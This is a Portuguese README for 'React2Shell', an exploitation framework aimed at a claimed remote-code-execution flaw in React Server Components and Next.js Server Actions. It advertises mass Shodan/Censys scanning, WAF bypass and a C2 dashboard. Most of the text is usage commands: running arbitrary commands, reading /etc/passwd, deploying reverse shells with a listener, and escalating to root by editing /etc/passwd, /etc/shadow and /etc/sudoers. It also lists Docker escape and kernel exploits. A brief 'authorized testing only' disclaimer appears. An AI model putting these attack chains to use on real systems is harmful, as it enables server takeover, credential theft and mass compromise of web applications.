Kit de exploração de elite para CVE-2025-55182 (RCE em React Server Components). Payloads polimórficos assíncronos, bypass avançado de WAF/CDN, rotação de proxy, varredura em massa Shodan/Censys, auto-pwn + shells reversas, templates Nuclei, laboratório K8s e dashboard C2. Autorado por Sudeepa Wanigarathna – estritamente para red team autorizado e testes de penetração.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Framework de exploração de nível profissional para a vulnerabilidade de RCE em Server Actions do Next.js (React2Shell). Demonstra a cadeia de ataque completa, desde o acesso inicial até a escalada de privilégios para root.
Capacidades:
# Verificar vulnerabilidade
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Executar comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Exploração completa: RCE → Enumeração → Acesso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Motor de exploração principal (400+ linhas)
├── demo_exploit.py # Cadeia de ataque automatizada (290+ linhas)
├── interactive_shell.py # Shell interativo (280+ linhas)
├── reverse_shell_handler.py # Listener de reverse shell (180+ linhas)
├── post_exploit/
│ ├── linux_enum.py # Enumeração do sistema (330+ linhas)
│ ├── priv_esc.py # Escalada de privilégios (320+ linhas)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Documentação completa de uso
├── QUICKSTART.md # Referência rápida
└── BANNER.txt
# Verificação de vulnerabilidade
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Executar comandos
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Diferentes variantes de payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Com ofuscação
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Iniciar shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Comandos disponíveis:
# - execute <cmd> : Executar comando de shell
# - enum : Executar enumeração completa
# - escalate : Tentar escalada de privilégios
# - upload <local> <remote> : Enviar arquivo
# - download <remote> <local>: Baixar arquivo
# - shell <lhost> <lport>: Implantar reverse shell
# - info : Mostrar informações da sessão
# - exit : Sair
# Terminal 1: Iniciar listener
python3 reverse_shell_handler.py --lport 4444
# Terminal 2: Implantar shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Cadeia completa: Descoberta → RCE → Enumeração → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
O framework implementa uma cadeia de exploração completa em 6 etapas:
id/etc/shadow e listando /rootBinários SUID (GTFOBins)
Arquivos /etc Graváveis
/etc/passwd - Adicionar novo usuário root/etc/shadow - Limpar senha do root/etc/sudoers - Conceder sudo NOPASSWDEscape de Docker
Exploits de Kernel
Capabilities Linux
pip install -r requirements.txt
Dependências:
EXPLOITATION_GUIDE.md - Guia de uso completo com exemplosQUICKSTART.md - Referência rápida para comandos comunsAVISO: Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use apenas em sistemas que você possui ou para os quais tenha permissão escrita explícita para testar.
O autor não é responsável por qualquer uso indevido desta ferramenta. Use por sua conta e risco.
Este framework foi projetado para:
Licença MIT (Apenas para Fins Educacionais)
Sudeepa Wanigarathna
Versão: 1.0
Última Atualização: Dezembro de 2025
Para instruções detalhadas de uso, consulte EXPLOITATION_GUIDE.md